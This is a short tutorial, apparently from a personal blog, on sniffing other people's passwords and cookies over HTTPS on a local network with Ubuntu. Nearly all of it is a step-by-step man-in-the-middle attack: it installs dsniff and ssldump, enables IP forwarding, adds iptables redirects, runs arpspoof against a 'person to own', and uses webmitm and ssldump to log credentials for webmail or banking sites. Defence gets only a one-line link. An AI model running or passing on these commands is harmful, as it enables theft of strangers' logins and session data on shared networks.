Howto: Use arpspoof, webmitm, and ssldump to effectively sniff passwords and other info via https connections on the lan/wlan with Ubuntu Linux!
Let me show you how easy it is to sniff someone else's password/cookies via SSL/HTTPS on the LAN/WLAN with Ubuntu Linux.
We will be using ARP spoofing/poisoning for this attack. If you have problems with this howto, there is an alternative with ettercap here that may be a bit easier.
You can learn more about ARP spoofing and poisoning here.
The Attack preparation:
First, let's grab the necessary packages:
sudo apt-get install dsniff ssldump
Now let's enable packet forwarding:
sudo -s
echo 1 > /proc/sys/net/ipv4/ip_forward
Let's set some iptables rules:
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT
iptables -A FORWARD -j ACCEPT
arpspoof -t "target ip(person to own)" "gateway ip(router)"
webmitm -d
ssldump -n -d -k webmitm.crt | tee ssldump.log
Now all you do is wait for the target machine to log into Google/Gmail/Yahoo/MSN/Hotmail or any other HTTPS connection, even a bank or whatever interests you, and you will see the passwords pop up in the terminal.
Defense against this attack:
Please see my page on hardening the Ubuntu Linux kernel with sysctl here
It seems like this isn't working for everyone. I will be redoing this howto today, stay tuned.